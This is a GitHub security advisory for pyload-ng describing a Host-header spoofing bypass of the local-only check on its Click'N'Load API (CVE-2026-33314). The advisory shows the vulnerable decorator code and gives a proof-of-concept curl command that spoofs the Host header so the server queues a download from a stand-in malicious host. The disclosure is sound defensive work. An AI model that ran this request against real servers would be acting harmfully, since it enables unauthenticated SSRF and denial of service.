GHSA-Q485-CG9Q-XQ2R
Vulnerability from github – Published: 2026-03-19 17:55 – Updated: 2026-03-27 21:57
VLAI?
Summary
Improper Authentication and Origin Validation Error in pyload-ng
Details
Summary
A Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS).
Details
The pyload WebUI provides an API for the Click'N'Load plugin, which is intended to be accessed only from the local machine (e.g., via a browser extension sending requests to localhost:9666). To enforce this, the pyload application uses a @local_check decorator on the relevant routes in src/pyload/webui/app/blueprints/cnl_blueprint.py.
However, the @local_check implementation relies on the user-controlled HTTP_HOST (derived from the HTTP Host header) to verify the origin:
# src/pyload/webui/app/blueprints/cnl_blueprint.py
def local_check(func):
@wraps(func)
def wrapper(*args, **kwargs):
remote_addr = flask.request.environ.get("REMOTE_ADDR", "0")
http_host = flask.request.environ.get("HTTP_HOST", "0")
if remote_addr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or http_host in (
"127.0.0.1:9666",
"[::1]:9666",
):
return func(*args, **kwargs)
else:
return "Forbidden", 403
return wrapper
Because http_host is read directly from the Host header of the HTTP request, an external attacker can easily spoof this header (e.g., Host: 127.0.0.1:9666). When this spoofed header is present, the condition http_host in ("127.0.0.1:9666", ...) evaluates to True, completely bypassing the IP address check (remote_addr) and granting access to the protected functions.
The affected routes are:
/flash/and/flash/<id>/flash/add/flash/addcrypted/flash/addcrypted2/flashgotand/flashgot_pyload/flash/checkSupportForUrl
PoC
- Ensure the PyLoad instance is running and accessible externally.
- Ensure the
ClickNLoadplugin is enabled in the PyLoad settings (it evaluates to disabled by default). - Send a POST request to one of the protected endpoints, such as
/flash/add, and spoof theHostheader to127.0.0.1:9666.
Example curl command:
curl -i -X POST "http://<pyload-external-ip>:<port>/flash/add" \
-H "Host: 127.0.0.1:9666" \
-d "urls=http://malicious.com/payload.bin" \
-d "package=MaliciousPackage"
- Notice that you receive a
success\r\nresponse instead of a403 Forbidden. The package and URL will be successfully added to the PyLoad queue.
Impact
This vulnerability allows unauthenticated attackers to interact with the Click'N'Load API. Attackers can arbitrarily add URLs to the download queue, which forces the PyLoad server to make outbound requests to attacker-controlled or internal URLs (SSRF). Attackers can also exhaust the server's storage or bandwidth by queueing massive files (DoS).
Severity ?
6.5 (Medium)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.5.0b3.dev96"
},
"package": {
"ecosystem": "PyPI",
"name": "pyload-ng"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.0b3.dev97"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33314"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-346"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-19T17:55:53Z",
"nvd_published_at": "2026-03-24T20:16:27Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nA Host Header Spoofing vulnerability in the `@local_check` decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click\u0027N\u0027Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS).\n\n### Details\n\nThe `pyload` WebUI provides an API for the Click\u0027N\u0027Load plugin, which is intended to be accessed only from the local machine (e.g., via a browser extension sending requests to `localhost:9666`). To enforce this, the `pyload` application uses a `@local_check` decorator on the relevant routes in `src/pyload/webui/app/blueprints/cnl_blueprint.py`.\n\nHowever, the `@local_check` implementation relies on the user-controlled `HTTP_HOST` (derived from the HTTP `Host` header) to verify the origin:\n\n```python\n# src/pyload/webui/app/blueprints/cnl_blueprint.py\ndef local_check(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n remote_addr = flask.request.environ.get(\"REMOTE_ADDR\", \"0\")\n http_host = flask.request.environ.get(\"HTTP_HOST\", \"0\")\n\n if remote_addr in (\"127.0.0.1\", \"::ffff:127.0.0.1\", \"::1\", \"localhost\") or http_host in (\n \"127.0.0.1:9666\",\n \"[::1]:9666\",\n ):\n return func(*args, **kwargs)\n else:\n return \"Forbidden\", 403\n return wrapper\n```\n\nBecause `http_host` is read directly from the `Host` header of the HTTP request, an external attacker can easily spoof this header (e.g., `Host: 127.0.0.1:9666`). When this spoofed header is present, the condition `http_host in (\"127.0.0.1:9666\", ...)` evaluates to `True`, completely bypassing the IP address check (`remote_addr`) and granting access to the protected functions.\n\nThe affected routes are:\n\n- `/flash/` and `/flash/\u003cid\u003e`\n- `/flash/add`\n- `/flash/addcrypted`\n- `/flash/addcrypted2`\n- `/flashgot` and `/flashgot_pyload`\n- `/flash/checkSupportForUrl`\n\n### PoC\n\n1. Ensure the PyLoad instance is running and accessible externally.\n2. Ensure the `ClickNLoad` plugin is enabled in the PyLoad settings (it evaluates to disabled by default).\n3. Send a POST request to one of the protected endpoints, such as `/flash/add`, and spoof the `Host` header to `127.0.0.1:9666`.\n\nExample `curl` command:\n\n```bash\ncurl -i -X POST \"http://\u003cpyload-external-ip\u003e:\u003cport\u003e/flash/add\" \\\n -H \"Host: 127.0.0.1:9666\" \\\n -d \"urls=http://malicious.com/payload.bin\" \\\n -d \"package=MaliciousPackage\"\n```\n\n4. Notice that you receive a `success\\r\\n` response instead of a `403 Forbidden`. The package and URL will be successfully added to the PyLoad queue.\n\n### Impact\n\nThis vulnerability allows unauthenticated attackers to interact with the Click\u0027N\u0027Load API. Attackers can arbitrarily add URLs to the download queue, which forces the PyLoad server to make outbound requests to attacker-controlled or internal URLs (SSRF). Attackers can also exhaust the server\u0027s storage or bandwidth by queueing massive files (DoS).",
"id": "GHSA-q485-cg9q-xq2r",
"modified": "2026-03-27T21:57:12Z",
"published": "2026-03-19T17:55:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33314"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyload/pyload"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Improper Authentication and Origin Validation Error in pyload-ng"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…